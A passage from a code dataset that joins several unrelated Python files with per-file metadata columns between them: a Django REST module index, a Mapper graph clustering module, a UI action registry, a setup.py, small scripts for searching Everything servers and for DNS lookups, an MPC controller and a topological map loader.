] | null | null | null | optimal_transport_morphometry/core/rest/__init__.py | girder/otm-server | 7abfe9c2d659c962784e28058d8f9a8ffc1f4991 | [
"Apache-2.0"
] | 5 | 2022-03-10T19:39:22.000Z | 2022-03-17T21:05:10.000Z | optimal_transport_morphometry/core/rest/__init__.py | girder/otm-server | 7abfe9c2d659c962784e28058d8f9a8ffc1f4991 | [
"Apache-2.0"
] | null | null | null | from .atlas import AtlasViewSet
from .dataset import DatasetViewSet
from .feature_image import FeatureImageViewSet
from .image import ImageViewSet
from .jacobian_image import JacobianImageViewSet
from .pending_upload import PendingUploadViewSet
from .preprocess import PreprocessingViewSet
from .registered_image import RegisteredImageViewSet
from .segmented_image import SegmentedImageViewSet
from .upload_batch import UploadBatchViewSet
from .user import UserViewSet
from .utm_analysis import UTMAnalysisViewSet
__all__ = [
'AtlasViewSet',
'BoundedLimitOffsetPagination',
'DatasetViewSet',
'FeatureImageViewSet',
'ImageViewSet',
'JacobianImageViewSet',
'PendingUploadViewSet',
'PreprocessingViewSet',
'RegisteredImageViewSet',
'SegmentedImageViewSet',
'UploadBatchViewSet',
'UserViewSet',
'UTMAnalysisViewSet',
]
| 29.931034 | 52 | 0.801843 | 69 | 868 | 9.927536 | 0.434783 | 0.080292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135945 | 868 | 28 | 53 | 31 | 0.913333 | 0 | 0 | 0 | 0 | 0 | 0.270737 | 0.081797 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
955013be054c4a72417ee62bd756cdccfad209de | 9,050 | py | Python | src/docs/rizvi2017_sakmapper/sakmapper/network.py | SMRUCC/Erica | 1829cf4e89681fcadd3a5f8b1be1de7db920fb49 | [
"MIT"
] | null | null | null | src/docs/rizvi2017_sakmapper/sakmapper/network.py | SMRUCC/Erica | 1829cf4e89681fcadd3a5f8b1be1de7db920fb49 | [
"MIT"
] | null | null | null | src/docs/rizvi2017_sakmapper/sakmapper/network.py | SMRUCC/Erica | 1829cf4e89681fcadd3a5f8b1be1de7db920fb49 | [
"MIT"
] | null | null | null | from math import sqrt
import numpy as np
import pandas as pd
from scipy.spatial.distance import pdist, squareform, euclidean
import networkx as nx
from sklearn import cluster
from lens import apply_lens
import scipy
def davies_bouldin(dist_mu, sigma):
    """Davies-Bouldin clustering index.

    For each cluster i, take the worst (largest) similarity ratio
    (sigma[i] + sigma[j]) / dist_mu[i, j] against any other cluster j,
    then average those worst ratios over all clusters.  Lower values
    indicate tighter, better-separated clusters.

    :param dist_mu: square matrix of pairwise distances between cluster centers
    :param sigma: per-cluster dispersion values (len(sigma) clusters)
    """
    n_clusters = len(sigma)
    worst_ratios = []
    for i in range(n_clusters):
        ratios = [
            (sigma[i] + sigma[j]) / dist_mu[i, j]
            for j in range(n_clusters)
            if j != i
        ]
        # max([0.0] + ...) reproduces the original accumulator, which
        # started at 0 and only ever increased.
        worst_ratios.append(max([0.0] + ratios))
    return sum(worst_ratios) / n_clusters
def covering_patches(lens_data, resolution=10, gain=0.5, equalize=True):
    """Build an overlapping cover of the 2-D lens space.

    lens_data  -- DataFrame whose first two columns are the lens coordinates.
    resolution -- number of intervals per axis (resolution**2 patches).
    gain       -- fractional overlap ("spill over") added on each side.
    equalize   -- if True, interval edges are percentile fence posts so that
                  patches hold roughly equal numbers of points; otherwise the
                  axes are split into equal-width intervals.

    Returns a dict mapping ((x_lo, x_hi), (y_lo, y_hi)) (rounded to 2 d.p.)
    to the list of row labels that fall strictly inside the patch.
    """
    cols = lens_data.columns
    xmin, xmax = lens_data[cols[0]].min(), lens_data[cols[0]].max()
    ymin, ymax = lens_data[cols[1]].min(), lens_data[cols[1]].max()

    # Compute per-axis interval bounds; the patch-collection loop below is
    # shared (the original duplicated it verbatim in both branches).
    if equalize:
        perc_step = 100.0 / resolution
        fence_posts_x = [np.percentile(lens_data[cols[0]], post)
                         for post in np.arange(perc_step, 100, perc_step)]
        fence_posts_y = [np.percentile(lens_data[cols[1]], post)
                         for post in np.arange(perc_step, 100, perc_step)]
        lower_bound_x = np.array([xmin] + fence_posts_x)
        upper_bound_x = np.array(fence_posts_x + [xmax])
        lower_bound_y = np.array([ymin] + fence_posts_y)
        upper_bound_y = np.array(fence_posts_y + [ymax])
        spill_over_x = gain * (upper_bound_x - lower_bound_x)
        spill_over_y = gain * (upper_bound_y - lower_bound_y)
    else:
        width_x = (xmax - xmin) / resolution
        width_y = (ymax - ymin) / resolution
        lower_bound_x = np.arange(xmin, xmax, width_x)
        upper_bound_x = lower_bound_x + width_x
        lower_bound_y = np.arange(ymin, ymax, width_y)
        upper_bound_y = lower_bound_y + width_y
        spill_over_x = gain * width_x
        spill_over_y = gain * width_y

    # Widen every interval by its spill-over so neighbouring patches overlap.
    lower_bound_x = lower_bound_x - spill_over_x
    upper_bound_x = upper_bound_x + spill_over_x
    lower_bound_y = lower_bound_y - spill_over_y
    upper_bound_y = upper_bound_y + spill_over_y

    patch_dict = {}
    for i in range(resolution):
        for j in range(resolution):
            # strict inequalities, as in the original implementation
            in_patch = ((lens_data[cols[0]] > lower_bound_x[i]) &
                        (lens_data[cols[0]] < upper_bound_x[i]) &
                        (lens_data[cols[1]] > lower_bound_y[j]) &
                        (lens_data[cols[1]] < upper_bound_y[j]))
            key = ((round(lower_bound_x[i], 2), round(upper_bound_x[i], 2)),
                   (round(lower_bound_y[j], 2), round(upper_bound_y[j], 2)))
            patch_dict[key] = list(lens_data[in_patch].index)
    return patch_dict
def gap(data, refs=None, nrefs=20, ks=range(1, 11), method=None):
    """Gap statistic (Tibshirani et al.) for choosing a cluster count.

    data   -- (n_samples, n_features) array to cluster.
    refs   -- optional (n_samples, n_features, nrefs) reference samples; when
              None, uniform samples over the data's bounding box are drawn.
    nrefs  -- number of reference data sets when refs is None.
    ks     -- candidate cluster counts.
    method -- clustering factory called as method(n_clusters=k); the fitted
              object must expose cluster_centers_ and labels_.

    Returns an array of gap values, one per entry of ks.
    """
    shape = data.shape
    if refs is None:
        tops = data.max(axis=0)
        bots = data.min(axis=0)
        # The original used scipy.matrix/scipy.random/... -- those NumPy
        # aliases were removed from modern SciPy. Multiplying by a diagonal
        # matrix just scales columns, so plain broadcasting is equivalent.
        rands = np.random.random_sample(size=(shape[0], shape[1], nrefs))
        for i in range(nrefs):
            rands[:, :, i] = rands[:, :, i] * (tops - bots) + bots
    else:
        rands = refs
    gaps = np.zeros((len(ks),))
    for (i, k) in enumerate(ks):
        g1 = method(n_clusters=k).fit(data)
        (kmc, kml) = (g1.cluster_centers_, g1.labels_)
        # within-cluster dispersion of the real data
        disp = sum(euclidean(data[m, :], kmc[kml[m], :]) for m in range(shape[0]))
        refdisps = np.zeros((rands.shape[2],))
        for j in range(rands.shape[2]):
            g2 = method(n_clusters=k).fit(rands[:, :, j])
            (kmc, kml) = (g2.cluster_centers_, g2.labels_)
            refdisps[j] = sum(euclidean(rands[m, :, j], kmc[kml[m], :])
                              for m in range(shape[0]))
        gaps[i] = np.log(np.mean(refdisps)) - np.log(disp)
    return gaps
def _davies_bouldin_index(X, labels_frame, k, centers):
    """Davies-Bouldin score of one clustering (labels as a 1-column frame)."""
    dist_mu = squareform(pdist(centers))
    sigma = []
    for i in range(k):
        points_in_cluster = labels_frame[labels_frame[0] == i].index
        sigma.append(sqrt(X.loc[points_in_cluster, :].var(axis=0).sum()))
    return davies_bouldin(dist_mu, np.array(sigma))


def optimal_clustering(df, patch, method='kmeans', statistic='gap', max_K=5):
    """Split the rows of `patch` into an optimal number of clusters.

    df        -- DataFrame containing the raw data, indexed by point label.
    patch     -- list of row labels belonging to this patch.
    method    -- 'kmeans' or (for statistic='db') 'agglomerative'.
    statistic -- model-selection criterion: 'gap' or 'db' (Davies-Bouldin).
    max_K     -- largest cluster count considered.

    Returns a list of clusters, each a list of row labels.
    Raises ValueError for unsupported method/statistic combinations
    (the original fell through silently or raised a string, which is a
    TypeError on Python 3).
    """
    if len(patch) == 1:
        return [patch]
    if statistic == 'db':
        if method not in ('kmeans', 'agglomerative'):
            raise ValueError("db statistic supports 'kmeans' and "
                             "'agglomerative' only, got %r" % (method,))
        # integer division: `/` would make K_max a float on Python 3 and
        # break range() below
        K_max = 2 if len(patch) <= 5 else min(len(patch) // 2, max_K)
        clustering = {}
        db_index = []
        X = df.loc[patch, :]  # .ix was removed from pandas
        for k in range(2, K_max + 1):
            if method == 'kmeans':
                model = cluster.KMeans(n_clusters=k).fit(X)
                clustering[k] = pd.DataFrame(model.predict(X), index=patch)
                centers = model.cluster_centers_
            else:
                model = cluster.AgglomerativeClustering(n_clusters=k,
                                                        linkage='average')
                clustering[k] = pd.DataFrame(model.fit_predict(X), index=patch)
                # agglomerative clustering has no centers; use cluster means
                members = [list(clustering[k][clustering[k][0] == i].index)
                           for i in range(k)]
                centers = np.array([np.mean(X.loc[c, :], axis=0)
                                    for c in members])
            db_index.append(_davies_bouldin_index(X, clustering[k], k, centers))
        k_optimal = np.argmin(np.array(db_index)) + 2
        return [list(clustering[k_optimal][clustering[k_optimal][0] == i].index)
                for i in range(k_optimal)]
    elif statistic == 'gap':
        if method != 'kmeans':
            raise ValueError("gap statistic is only implemented for 'kmeans'")
        X = np.array(df.loc[patch, :])
        f = cluster.KMeans
        gaps = gap(X, ks=range(1, min(max_K, len(patch))), method=f)
        k_optimal = list(gaps).index(max(gaps)) + 1
        clustering = pd.DataFrame(f(n_clusters=k_optimal).fit_predict(X),
                                  index=patch)
        return [list(clustering[clustering[0] == i].index)
                for i in range(k_optimal)]
    raise ValueError("error: only 'db' and 'gap' statistics are supported")
def mapper_graph(df, lens_data=None, lens='pca', resolution=10, gain=0.5, equalize=True, clust='kmeans', stat='gap',
                 max_K=5):
    """
    input: N x n_dim image of raw data under lens function, as a dataframe
    output: (undirected graph, list of node contents, dictionary of patches)
    """
    if lens_data is None:
        lens_data = apply_lens(df, lens=lens)

    # cluster every non-empty patch of the cover independently
    patch_clusterings = {}
    counter = 0
    patches = covering_patches(lens_data, resolution=resolution, gain=gain, equalize=equalize)
    for key, patch in patches.items():
        if len(patch) > 0:
            patch_clusterings[key] = optimal_clustering(df, patch, method=clust, statistic=stat, max_K=max_K)
            counter += 1
    # single-argument print() works on both Python 2 and 3 (the original
    # Python 2 print statements are SyntaxErrors on Python 3)
    print('total of {} patches required clustering'.format(counter))

    all_clusters = []
    for key in patch_clusterings:
        all_clusters += patch_clusterings[key]
    num_nodes = len(all_clusters)
    print('this implies {} nodes in the mapper graph'.format(num_nodes))

    # adjacency: two clusters are linked when they share at least one point
    A = np.zeros((num_nodes, num_nodes))
    for i in range(num_nodes):
        for j in range(i):
            overlap = set(all_clusters[i]).intersection(set(all_clusters[j]))
            if len(overlap) > 0:
                A[i, j] = 1
                A[j, i] = 1
    G = nx.from_numpy_matrix(A)  # NOTE(review): removed in networkx >= 3.0 (use from_numpy_array)

    # drop duplicated singleton clusters and relabel the surviving nodes
    total = []
    all_clusters_new = []
    mapping = {}
    cont = 0
    for m in all_clusters:
        total += m
    for n, m in enumerate(all_clusters):
        # NOTE(review): `total` holds cluster *members* while `m` is a list,
        # so total.count(m) is 0 unless members are themselves lists --
        # possibly total.count(m[0]) was intended; confirm before changing.
        if len(m) == 1 and total.count(m) > 1:
            G.remove_node(n)
        else:
            all_clusters_new.append(m)
            mapping[n] = cont
            cont += 1
    H = nx.relabel_nodes(G, mapping)
    return H, all_clusters_new, patches
| 40.950226 | 116 | 0.56442 | 1,271 | 9,050 | 3.81904 | 0.152636 | 0.036259 | 0.034611 | 0.024928 | 0.445818 | 0.383395 | 0.36918 | 0.323651 | 0.296663 | 0.281417 | 0 | 0.015448 | 0.306188 | 9,050 | 220 | 117 | 41.136364 | 0.757605 | 0 | 0 | 0.305263 | 0 | 0 | 0.020824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042105 | null | null | 0.010526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9553461c6b5d5f3e7227dd35a7b192c4ef31e24c | 3,448 | py | Python | binp/action.py | reddec/binp | d72f6b6c910ee178c221c92ce88a37120955342f | [
"MIT"
] | null | null | null | binp/action.py | reddec/binp | d72f6b6c910ee178c221c92ce88a37120955342f | [
"MIT"
] | null | null | null | binp/action.py | reddec/binp | d72f6b6c910ee178c221c92ce88a37120955342f | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from logging import getLogger
from typing import List, Callable, Awaitable, Optional, Dict
from pydantic.main import BaseModel
@dataclass
class ActionHandler:
    # A registered UI action: display metadata plus the coroutine to run.
    name: str
    description: str
    handler: Callable[[], Awaitable]

    async def __call__(self):
        # Delegate straight to the wrapped coroutine function.
        return await self.handler()
class ActionInfo(BaseModel):
    # Serializable view of an action: its name and human-readable description.
    name: str
    description: str
class Action:
    """
    Expose user-defined async functions as 'buttons' in the UI.

    Instances are used as decorators, optionally with ``name`` and
    ``description`` keyword arguments; when omitted, the fully-qualified
    function name and the (whitespace-stripped) doc-string are used. The
    decorated function is not journaled automatically -- add the journal
    annotation yourself if needed.

    Actions are indexed by name: registering a second action under an
    existing name replaces the first one (a warning is logged).
    """

    def __init__(self):
        # name -> ActionHandler registry
        self.__actions: Dict[str, ActionHandler] = {}

    def __call__(self, func: Optional[Callable[[], Awaitable]] = None, *, name: Optional[str] = None,
                 description: Optional[str] = None):
        """
        Decorator that exposes a function as an action in the UI (e.g. a button).
        """
        def register(fn: Callable[[], Awaitable]):
            action_name = fn.__qualname__ if name is None else name
            if description is not None:
                action_description = description
            else:
                doc = fn.__doc__ or ''
                action_description = "\n".join(line.strip() for line in doc.splitlines()).strip()
            if action_name in self.__actions:
                previous = self.__actions[action_name]
                getLogger(self.__class__.__qualname__).warning("redefining UI action %r: %s => %s", action_name,
                                                               previous.handler.__qualname__, fn.__qualname__)
            self.__actions[action_name] = ActionHandler(name=action_name,
                                                        description=action_description,
                                                        handler=fn)
            return fn

        # support both @action and @action(name=..., description=...)
        return register if func is None else register(func)

    async def invoke(self, name: str) -> bool:
        """
        Invoke an action by name, or ignore unknown names. Errors raised by
        the handler are NOT suppressed.

        :param name: action name
        :return: true if the action was invoked
        """
        try:
            handler = self.__actions[name]
        except KeyError:
            getLogger(self.__class__.__qualname__).warning("attempt to invoke unknown action %r", name)
            return False
        await handler()
        return True

    @property
    def actions(self) -> List[ActionInfo]:
        """
        Copy of the list of defined actions, prepared for serialization.
        """
        infos = []
        for item in self.__actions.values():
            infos.append(ActionInfo(name=item.name, description=item.description))
        return infos
| 28.262295 | 110 | 0.603538 | 396 | 3,448 | 5.106061 | 0.340909 | 0.032641 | 0.020772 | 0.020772 | 0.104847 | 0.072206 | 0.072206 | 0.072206 | 0.072206 | 0.072206 | 0 | 0.00084 | 0.309165 | 3,448 | 121 | 111 | 28.495868 | 0.848027 | 0.319606 | 0 | 0.088889 | 0 | 0 | 0.035425 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.088889 | 0 | 0.511111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
95544647ff349eb4a01e5554edfa84ba7d0fcd85 | 377 | py | Python | archived/silbiocomp/Practicals/Code/oaks_test.py | mathemage/TheMulQuaBio | 63a0ad6803e2aa1b808bc4517009c18a8c190b4c | [
"MIT"
] | 1 | 2019-10-12T13:33:14.000Z | 2019-10-12T13:33:14.000Z | archived/silbiocomp/Practicals/Code/oaks_test.py | OScott19/TheMulQuaBio | 197d710f76163469dfc7fa9d2d95ba3a739eccc7 | [
"MIT"
] | null | null | null | archived/silbiocomp/Practicals/Code/oaks_test.py | OScott19/TheMulQuaBio | 197d710f76163469dfc7fa9d2d95ba3a739eccc7 | [
"MIT"
] | null | null | null | #Define function
def is_an_oak(name):
    """Return True when `name` begins with the genus 'Quercus ' (case-insensitive).

    >>> is_an_oak('Fagus sylvatica')
    False

    >>> is_an_oak('Quercus robur')
    True

    # A typo
    >>> is_an_oak('Quercuss')
    False
    """
    lowered = name.lower()
    return lowered.startswith('quercus ')
# Show the doc-string (with its doctest examples), then execute them.
print(is_an_oak.__doc__)

import doctest
doctest.testmod()  # Run embedded tests
| 17.952381 | 53 | 0.64191 | 51 | 377 | 4.470588 | 0.607843 | 0.087719 | 0.153509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228117 | 377 | 20 | 54 | 18.85 | 0.783505 | 0.527851 | 0 | 0 | 0 | 0 | 0.058394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
955985352515b7765d03062b6623dbef440b0c67 | 1,353 | py | Python | setup.py | MiCHiLU/watchlion | ee24866ca2c559f0ab8d5e3c67dba2414d39810b | [
"MIT"
] | 1 | 2016-06-17T20:09:26.000Z | 2016-06-17T20:09:26.000Z | setup.py | MiCHiLU/watchlion | ee24866ca2c559f0ab8d5e3c67dba2414d39810b | [
"MIT"
] | null | null | null | setup.py | MiCHiLU/watchlion | ee24866ca2c559f0ab8d5e3c67dba2414d39810b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
# Packaging metadata for `watchlion`, a macOS filesystem-event monitor
# built on PyYAML and MacFSEvents (MIT licensed).
setup(name="watchlion",
      version="0.3",
      description="Filesystem events monitoring",
      long_description=open('README.rst').read(),
      author="ENDOH takanao",
      license="MIT",
      url="http://github.com/MiCHiLU/watchlion",
      keywords=' '.join([
          'python',
          'filesystem',
          'monitoring',
          'monitor',
          'FSEvents',
      ]
      ),
      classifiers=[
          'Environment :: Console',
          'Intended Audience :: Developers',
          'Intended Audience :: System Administrators',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Operating System :: MacOS :: MacOS X',
          'Programming Language :: Python',
          'Topic :: Software Development :: Libraries',
          'Topic :: System :: Monitoring',
          'Topic :: System :: Filesystems',
          'Topic :: Utilities',
          'Programming Language :: Python :: 2.6',
          'Programming Language :: Python :: 2.7',
          'Programming Language :: Python :: 3',
      ],
      py_modules=['watchlion'],
      install_requires=['PyYAML', 'MacFSEvents'],
      # `watchlion` console command dispatches to watchlion:main
      entry_points={
          'console_scripts': [
              'watchlion = watchlion:main',
          ]
      },
      zip_safe=False,
      )
| 29.413043 | 53 | 0.553585 | 116 | 1,353 | 6.396552 | 0.689655 | 0.102426 | 0.134771 | 0.070081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008386 | 0.2949 | 1,353 | 45 | 54 | 30.066667 | 0.769392 | 0.031042 | 0 | 0 | 0 | 0 | 0.507257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.02439 | 0 | 0.02439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
955d1194e5057c9c5dcdc2ebc8966d395f199949 | 1,665 | py | Python | cloud/blog/tests.py | XINGYANGSOFT/HuaZhang-Data-Engine | f40a45273e925bb35abb17045f41a440c09b5308 | [
"Unlicense"
] | null | null | null | cloud/blog/tests.py | XINGYANGSOFT/HuaZhang-Data-Engine | f40a45273e925bb35abb17045f41a440c09b5308 | [
"Unlicense"
] | null | null | null | cloud/blog/tests.py | XINGYANGSOFT/HuaZhang-Data-Engine | f40a45273e925bb35abb17045f41a440c09b5308 | [
"Unlicense"
] | null | null | null | # -*- coding:utf-8 -*-
import urllib
import urllib.request
import json
import django.utils.http
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from operator import itemgetter # 排序
import time
from django.core.paginator import Paginator
servers = ['127.0.0.1:8100', '127.0.0.1:8100', '127.0.0.1:8100']  # IPs of the Everything servers to query
results = []
servernum = len(servers)  # number of servers; a later version will count online databases instead
resultsnumbers = 0
for server in servers:
    # Everything HTTP search API: sort by modification date, JSON output,
    # at most 1000 results per server.
    url = 'http://{}/?s={}&j=1&sort=date_modified&ascending=0&date_modified_column=1&path_column=1&c=1000'.format(
        server, '1')
    username = '59'  # HTTP basic-auth login for the Everything server -- start
    password = '119119'
    p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
    p.add_password(None, url, username, password)
    handler = urllib.request.HTTPBasicAuthHandler(p)
    opener = urllib.request.build_opener(handler)
    urllib.request.install_opener(opener)  # HTTP basic-auth login -- end
    response = urllib.request.urlopen(url)
    data = json.loads(response.read().decode("utf-8"))
    resultsnumbers = resultsnumbers + int(data['totalResults'])
    for results_dic in data['results']:
        date_modified = results_dic['date_modified']  # FileTime
        date_modified = int(date_modified[:-7]) - 11644473600  # FileTime to UnixTime
        date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(date_modified))
        results_dic['date_modified'] = date
        results_dic['ip'] = server[:-5]  # add the server IP (port suffix stripped) to the returned dict
        results_dic['ip_all'] = server
    results.extend(data['results'])
p = Paginator(results, 5)  # show 5 list entries per page
page1 = p.page(1)  # first page
print(page1.object_list)
955daeb9c4fc7e8cfbaa3a981344aeee133bb903 | 275 | py | Python | top50.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | top50.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | top50.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | from dnsget import dnsget
from analyse_dependency import a_d
# Read target hostnames (one per line) from "targetd2", resolve them via
# dnsget, then run the dependency analysis a_d over the result set.
f=open("targetd2")
line=f.readline().strip('\n')
o=open("targetd2r",'w')  # NOTE(review): opened but never written to -- confirm intent
target=[]
name="top50"
while (line):
    target.append(line)
    line=f.readline().strip('\n')
r=dnsget(target,name)
a_d(name)
f.close()
o.close()
| 18.333333 | 34 | 0.709091 | 46 | 275 | 4.173913 | 0.521739 | 0.020833 | 0.135417 | 0.1875 | 0.197917 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.083636 | 275 | 14 | 35 | 19.642857 | 0.746032 | 0 | 0 | 0.142857 | 0 | 0 | 0.098182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9562537d1e63988861ba9738ef70a06f9a31fe28 | 2,338 | py | Python | cs294/hw4/controllers.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs294/hw4/controllers.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs294/hw4/controllers.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from cost_functions import trajectory_cost_fn
import time
class Controller():
    """Abstract base class for policies mapping states to actions."""

    def __init__(self):
        pass

    # Get the appropriate action(s) for this state(s)
    def get_action(self, state):
        """Return the action(s) for ``state``; implemented by subclasses."""
        pass
class RandomController(Controller):
    """Baseline policy: ignores the state and acts at random."""

    def __init__(self, env):
        """Keep a reference to the environment whose action space we sample."""
        self.env = env

    def get_action(self, state):
        """Return an action drawn uniformly from the env's action space."""
        action_space = self.env.action_space
        return action_space.sample()
class MPCcontroller(Controller):
    """ Controller built using the MPC method outlined in https://arxiv.org/abs/1708.02596 """

    def __init__(self,
                 env,
                 dyn_model,
                 horizon=5,
                 cost_fn=None,
                 num_simulated_paths=10,
                 ):
        # env                 -- environment providing action/observation spaces
        # dyn_model           -- learned dynamics model exposing predict(states, actions)
        # horizon             -- timesteps simulated per candidate path
        # cost_fn             -- per-step cost consumed by trajectory_cost_fn
        # num_simulated_paths -- number of random action sequences evaluated
        self.env = env
        self.dyn_model = dyn_model
        self.horizon = horizon
        self.cost_fn = cost_fn
        self.num_simulated_paths = num_simulated_paths

    def get_action(self, state):
        """Random-shooting MPC: sample random action sequences, roll them all
        out through the dynamics model in batch, and return the FIRST action
        of the cheapest simulated trajectory."""
        # rollout buffers of shape (num_paths, horizon, obs_dim)
        observations = np.empty(
            (self.num_simulated_paths, self.horizon, self.env.observation_space.shape[0]))
        next_observations = np.empty(
            (self.num_simulated_paths, self.horizon, self.env.observation_space.shape[0]))
        # one random action sequence per simulated path
        actions = [
            [self.env.action_space.sample()
             for _ in range(self.horizon)]
            for _ in range(self.num_simulated_paths)
        ]
        actions = np.array(actions)
        # every path starts from the current state
        last_state = np.array([state for _ in range(self.num_simulated_paths)])
        for idx in range(self.horizon):
            action_batch = actions[:, idx]
            # batched one-step prediction across all paths (speed-critical)
            next_state = self.dyn_model.predict(last_state, action_batch)
            observations[:, idx, :] = last_state
            next_observations[:, idx, :] = next_state
            last_state = next_state
        # total cost of each simulated trajectory
        costs = np.array([trajectory_cost_fn(
            self.cost_fn, observations[i], actions[i],
            next_observations[i])
            for i in range(self.num_simulated_paths)
        ])
        min_cost_path_id = np.argmin(costs)
        # MPC: execute only the first action of the best path
        return actions[min_cost_path_id][0]
| 31.594595 | 94 | 0.602652 | 284 | 2,338 | 4.71831 | 0.295775 | 0.041791 | 0.101493 | 0.09403 | 0.287313 | 0.235821 | 0.214925 | 0.168657 | 0.119403 | 0.119403 | 0 | 0.009219 | 0.304106 | 2,338 | 73 | 95 | 32.027397 | 0.814382 | 0.107357 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013699 | 0 | 1 | 0.117647 | false | 0.039216 | 0.058824 | 0 | 0.27451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9568db91ad7ce15df9b019f1095a642670567350 | 1,738 | py | Python | src/topological_navigation/scripts/topological_map.py | LCAS/spqrel_navigation | b81db88cdcb3bad385c6d56a52e79cd235bf9c9e | [
"MIT"
] | 28 | 2017-06-27T07:45:35.000Z | 2022-02-19T03:34:18.000Z | src/topological_navigation/scripts/topological_map.py | LCAS/spqrel_navigation | b81db88cdcb3bad385c6d56a52e79cd235bf9c9e | [
"MIT"
] | 12 | 2017-07-22T22:09:05.000Z | 2021-07-30T10:20:45.000Z | src/topological_navigation/scripts/topological_map.py | LCAS/spqrel_navigation | b81db88cdcb3bad385c6d56a52e79cd235bf9c9e | [
"MIT"
] | 18 | 2017-07-09T12:12:38.000Z | 2022-01-27T22:37:42.000Z | import yaml
from topological_node import TopologicalNode
class TopologicalMap(object):
    """In-memory topological map loaded from a YAML list of node entries.

    Each YAML entry is a mapping with a 'node' key holding the node data
    consumed by TopologicalNode. Constructing without a filename yields an
    empty map.
    """

    def __init__(self, filename=None):
        if filename:
            lnodes = self._load_map(filename)
            self.nodes = self._get_nodes(lnodes)
        else:
            self.nodes = []

    def _get_nodes(self, lnodes):
        """Wrap every raw YAML entry in a TopologicalNode."""
        nodes = []
        for i in lnodes:
            node = TopologicalNode(i['node'])
            nodes.append(node)
        return nodes

    def _load_map(self, filename):
        """Parse the YAML map file and return the raw node list."""
        # was a Python 2 print statement (SyntaxError on Python 3)
        print("loading " + filename)
        with open(filename, 'r') as f:
            # safe_load: yaml.load without a Loader is unsafe and raises a
            # TypeError on PyYAML >= 6; map files contain plain data only.
            return yaml.safe_load(f)

    def get_dict(self):
        """Serialize all nodes back into the YAML-compatible dict layout."""
        s = []
        for i in self.nodes:
            node = {}
            node['node'] = {}
            node['node']['pointset'] = 'NA'
            node['node']['name'] = i.name
            node['node']['pose'] = {}
            node['node']['pose']['position'] = {
                'x': i.pose.position.x,
                'y': i.pose.position.y,
                'z': i.pose.position.z
            }
            node['node']['pose']['orientation'] = {
                'w': i.pose.orientation.w,
                'x': i.pose.orientation.x,
                'y': i.pose.orientation.y,
